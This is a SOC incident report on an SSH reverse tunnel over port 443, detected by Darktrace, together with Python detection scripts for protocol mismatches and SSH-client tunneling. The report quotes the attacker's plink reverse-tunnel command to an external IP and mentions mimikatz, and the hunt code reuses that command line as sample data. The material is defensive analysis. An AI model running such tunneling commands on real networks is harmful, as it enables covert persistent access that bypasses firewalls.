Darktrace Alert Details
Alert ID: DARKTRACE-NON-STANDARD-1571-7842
Alert Time: 2024-02-29 11:30:22 EST
Severity: HIGH (85/100)
Source: Darktrace Enterprise Immune System
Rule: “Non-Standard Protocol over Common Port – Potential Tunneling”
MITRE ATT&CK: T1571 – Non-Application Layer Protocol
Alert Details:
Detection: Non-HTTP traffic detected over port 443 (HTTPS port)
Source: 192.168.45.78 (ENG-WS-045 – Engineering)
Destination: 194.165.16[.]89:443
Time: 11:15-11:30 EST
Traffic Analysis:
Protocol: Not TLS/HTTPS (expected)
Protocol Detected: SSH (Secure Shell) over port 443
Packet Signatures:
SSH banner: “SSH-2.0-OpenSSH_8.9” detected
Key exchange initiated
Encrypted tunnel established
Duration: 15 minutes
Data transferred: 2.3 MB (inbound/outbound)
Detection Logic:
Port 443 is typically used for HTTPS (TLS)
SSH protocol detected on port 443 (anomalous)
Destination IP known for malicious activity
Pattern matches protocol tunneling/evasion
Additional Context:
ENG-WS-045 had previous suspicious activity
SSH tunneling often used for persistent access
Attacker bypassing firewall rules (port 443 allowed)
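The detection logic above boils down to a protocol/port mismatch check: the first client bytes on a TCP/443 connection should be a TLS ClientHello, and an SSH identification string there is a strong tunneling signal. The following is an added example (not Darktrace's logic or any code from the report) that applies that check to a few constructed flow records; the SSH banner string is the one the alert reported, the other payloads and the non-incident addresses are made up for illustration.

```python
"""Flag flows whose first client bytes do not match the protocol expected on the port.

Added example, not part of the Darktrace alert or the SOC report. The Flow records
below are constructed; only the SSH banner and the incident destination come from
the alert text.
"""
from dataclasses import dataclass


@dataclass
class Flow:
    src: str
    dst: str
    dst_port: int
    first_bytes: bytes  # first client-to-server payload bytes of the connection


# Protocol a defender expects to see on each well-known port.
EXPECTED_ON_PORT = {443: "tls", 22: "ssh", 80: "http"}


def classify_payload(data: bytes) -> str:
    """Identify the application protocol from the first client payload bytes."""
    # TLS record header: content type 0x16 (handshake), version major 0x03,
    # minor 0x00-0x04 (SSL 3.0 .. TLS 1.3 compat), 2-byte length, then
    # handshake type 0x01 (ClientHello).
    if (len(data) >= 6 and data[0] == 0x16 and data[1] == 0x03
            and data[2] <= 0x04 and data[5] == 0x01):
        return "tls"
    # SSH identification string (RFC 4253): "SSH-protoversion-softwareversion CRLF".
    if data.startswith(b"SSH-"):
        return "ssh"
    # Plaintext HTTP request line.
    if any(data.startswith(m) for m in (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"CONNECT ")):
        return "http"
    return "unknown"


def ssh_banner(data: bytes) -> str:
    """Return the SSH identification string without its line terminator."""
    return data.split(b"\r\n", 1)[0].split(b"\n", 1)[0].decode("ascii", "replace")


def find_mismatches(flows):
    """Return one alert per flow whose observed protocol differs from the port's expectation."""
    alerts = []
    for f in flows:
        expected = EXPECTED_ON_PORT.get(f.dst_port)
        if expected is None:
            continue  # no expectation for this port, nothing to compare against
        observed = classify_payload(f.first_bytes)
        if observed == expected:
            continue
        alert = {
            "src": f.src, "dst": f.dst, "dst_port": f.dst_port,
            "expected": expected, "observed": observed,
            # A positively identified foreign protocol is a stronger signal than
            # bytes we simply could not classify.
            "confidence": "high" if observed != "unknown" else "medium",
        }
        if observed == "ssh":
            alert["banner"] = ssh_banner(f.first_bytes)
        alerts.append(alert)
    return alerts


# Constructed sample input. Record 1 mirrors the incident flow; the rest use
# RFC 5737 documentation addresses.
TLS_CLIENT_HELLO = bytes.fromhex("16030100c4010000c00303")  # record header + ClientHello start
SAMPLE_FLOWS = [
    Flow("192.168.45.78", "194.165.16[.]89", 443, b"SSH-2.0-OpenSSH_8.9\r\n"),
    Flow("192.168.45.10", "203.0.113.5", 443, TLS_CLIENT_HELLO),
    Flow("192.168.45.22", "198.51.100.7", 22, b"SSH-2.0-OpenSSH_9.6\r\n"),
    Flow("192.168.45.31", "203.0.113.9", 443, b"GET / HTTP/1.1\r\nHost: x\r\n"),
]

if __name__ == "__main__":
    for a in find_mismatches(SAMPLE_FLOWS):
        print(a)
```

Run on the sample, the check flags the SSH-on-443 flow (with the banner extracted for the analyst) and the plaintext-HTTP-on-443 flow, and stays quiet on the genuine TLS and SSH-on-22 connections. In production the same logic runs over the first payload of each flow from a sensor or proxy rather than over hard-coded records.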
SOC Investigation Process
Step                      | Action                          | Tools Used                | Findings
1. Alert Validation       | Verify Darktrace alert          | Darktrace Console         | Confirmed SSH over port 443
2. Process Investigation  | Identify process on endpoint    | CrowdStrike Falcon        | plink.exe (PuTTY Link) running – SSH client
3. User Interview         | Contact rpatel                  | Teams, Phone              | User did NOT run SSH (account compromised)
4. Immediate Action       | Isolate host                    | CrowdStrike               | ENG-WS-045 quarantined
5. C2 Blocking            | Block destination IP            | Palo Alto                 | IP 194.165.16[.]89 blocked
6. Malware Removal        | Terminate plink.exe, clean host | CrowdStrike Live Response | SSH tunnel terminated; plink.exe deleted
Jira Incident Report
Ticket: SOC-2024-148
Summary: T1571 – SSH Tunneling over Port 443 for C2 Communication
Status: RESOLVED
Resolution: MALICIOUS – SSH Tunnel Terminated
Priority: P2 – MEDIUM
Labels: T1571, non-application-protocol, ssh-tunneling, darktrace, compromised-account
Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Darktrace Enterprise Immune System.
Alert: “Non-Standard Protocol over Common Port – Potential Tunneling”.
Source: ENG-WS-045 (Engineering, user rpatel).
Destination: 194.165.16[.]89:443.
Protocol: SSH (over port 443).
Time: 2024-02-29 11:30 EST.
Technique: MITRE ATT&CK T1571 – Non-Application Layer Protocol.
2. Technical Analysis:
Attack Chain:
10:30 – rpatel account compromised via phishing
10:45 – Attacker logs into ENG-WS-045 via RDP
10:50 – Attacker downloads plink.exe (SSH client)
11:00 – SSH tunnel established to 194.165.16[.]89:443
11:00-11:30 – Attacker uses tunnel for persistent access
11:30 – Darktrace detects
Tunneling Details:
Tool: plink.exe (PuTTY Link, legitimate SSH client)
Command: plink.exe -ssh -R 8080:localhost:80 attacker@194.165.16[.]89 -P 443 -i key.ppk
Purpose: Create reverse SSH tunnel for persistent access
Evasion: SSH over port 443 bypasses firewalls (port 443 allowed)
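The tunneling details above (a legitimate SSH client, a remote port forward, a non-standard server port, a binary dropped in a temp directory) are exactly the attributes an endpoint hunt can key on. The following is an added example, not part of the SOC report or of any EDR product, that encodes those attributes as a check over process-creation events. The event records are constructed; only the ENG-WS-045 command line and binary path are taken from the report, and the other hosts and addresses are made up.

```python
"""Hunt process-creation telemetry for SSH clients being used as tunnels.

Added example, not the SOC team's or a vendor's code. It turns the incident's
findings into a reusable check: an SSH client requesting port forwarding, talking
to a non-standard port, or launched from a temp/public directory. Sample events
are constructed; the ENG-WS-045 record reproduces the reported command line.
"""

SSH_CLIENTS = {"plink.exe", "ssh.exe", "putty.exe", "kitty.exe"}
FORWARD_FLAGS = ("-R", "-L", "-D")  # remote, local and dynamic (SOCKS) forwarding
SUSPICIOUS_DIRS = ("\\windows\\temp\\", "\\appdata\\local\\temp\\", "\\users\\public\\")


def parse_ssh_cmdline(cmdline):
    """Return (server port, forwarding flags) from an SSH client command line.

    plink takes the port as -P <port>, OpenSSH as -p <port>; both default to 22.
    Tokens are split on whitespace, which is sufficient for these samples (quoted
    paths containing spaces would need a proper Windows argv parser).
    """
    tokens = cmdline.split()
    port = 22
    forwards = []
    for i, tok in enumerate(tokens):
        if tok in ("-P", "-p") and i + 1 < len(tokens) and tokens[i + 1].isdigit():
            port = int(tokens[i + 1])
        elif tok in FORWARD_FLAGS:
            forwards.append(tok)  # separated form: -R 8080:localhost:80
        elif tok[:2] in FORWARD_FLAGS and len(tok) > 2 and tok[2].isdigit():
            forwards.append(tok[:2])  # attached form: -R8080:localhost:80
    return port, forwards


def assess_event(event):
    """Return a finding dict for a suspicious SSH client launch, else None."""
    image = event["image"]
    basename = image.rsplit("\\", 1)[-1].lower()
    if basename not in SSH_CLIENTS:
        return None
    port, forwards = parse_ssh_cmdline(event["cmdline"])
    reasons = []
    if forwards:
        reasons.append("port forwarding requested (%s)" % ",".join(sorted(set(forwards))))
    if port != 22:
        reasons.append("SSH to non-standard port %d" % port)
    if any(d in image.lower() for d in SUSPICIOUS_DIRS):
        reasons.append("SSH client launched from a temp/public directory")
    if not reasons:
        return None
    return {
        "host": event["host"], "user": event["user"], "image": image,
        "port": port, "forwards": sorted(set(forwards)), "reasons": reasons,
    }


def hunt(events):
    """Run assess_event over a batch of process-creation records."""
    return [f for f in (assess_event(e) for e in events) if f]


# Constructed sample telemetry. Record 1 is the incident; records 2 and 3 are
# a benign admin session and a second tunneling pattern (SOCKS over 443).
SAMPLE_EVENTS = [
    {"host": "ENG-WS-045", "user": "rpatel", "image": r"C:\Windows\Temp\plink.exe",
     "cmdline": "plink.exe -ssh -R 8080:localhost:80 attacker@194.165.16[.]89 -P 443 -i key.ppk"},
    {"host": "OPS-WS-012", "user": "admin", "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": "ssh.exe admin@10.20.30.40"},
    {"host": "FIN-WS-003", "user": "jlee", "image": r"C:\Users\jlee\AppData\Local\Temp\ssh.exe",
     "cmdline": "ssh.exe -p 443 -D 1080 -N user@203.0.113.8"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding["host"], finding["port"], finding["reasons"])
```

On the sample, the ENG-WS-045 event trips all three reasons, the SOCKS tunnel on FIN-WS-003 trips the same three, and the administrator's plain session to port 22 from the system OpenSSH path produces no finding. Each reason is a separate signal so the rule can be tuned: forwarding alone is common for legitimate administrators, while forwarding plus a 443 destination plus a temp-directory binary rarely is.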
Attacker Activity via Tunnel:
Remote shell access
Downloaded additional tools (mimikatz)
Enumerated local files
No data exfiltration yet
User Status:
Account compromised; user unaware
3. Investigation Findings:
Timeline:
10:30 – Account compromised
10:45 – Attacker logs in
10:50 – plink.exe downloaded
11:00-11:30 – SSH tunnel active
11:30 – Darktrace alert
11:32 – SOC investigates
11:33 – Host isolated
11:34 – SSH tunnel terminated
Indicators of Compromise (IoCs):
Network:
– Destination: 194.165.16[.]89:443 (SSH)
– Protocol: SSH over port 443
Files:
– C:\Windows\Temp\plink.exe (SHA256: a1b2c3d4…)
– C:\Users\rpatel\key.ppk (SSH private key)
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Terminated plink.exe process.
Deleted plink.exe and SSH key.
Blocked destination IP at firewall.
Disabled rpatel account.
Reset password.
Host Remediation:
Full scan (clean aside from attacker tools).
Reimaged as precaution.
User Remediation:
MFA enforced.
5. Root Cause Analysis:
Primary Cause: User account compromised, allowing attacker to establish SSH tunnel.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Outbound SSH allowed over port 443 (should be inspected).
6. Business Impact:
Operational Impact: Engineering host offline for 2 hours.
Data Exposure: None (tunnel used for access only).
7. Remediation & Prevention:
Completed Actions:
SSH tunnel terminated.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Implemented DPI (Deep Packet Inspection) on port 443.
Blocked SSH over non-standard ports.
8. Conclusion:
An attacker used a compromised engineering account to establish an SSH tunnel over port 443, evading firewall rules by using an allowed port. Darktrace detected the anomalous protocol usage and enabled rapid termination of the tunnel.
Closure Rationale: SSH tunnel terminated; malware removed; account secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-02-29 12:30 EST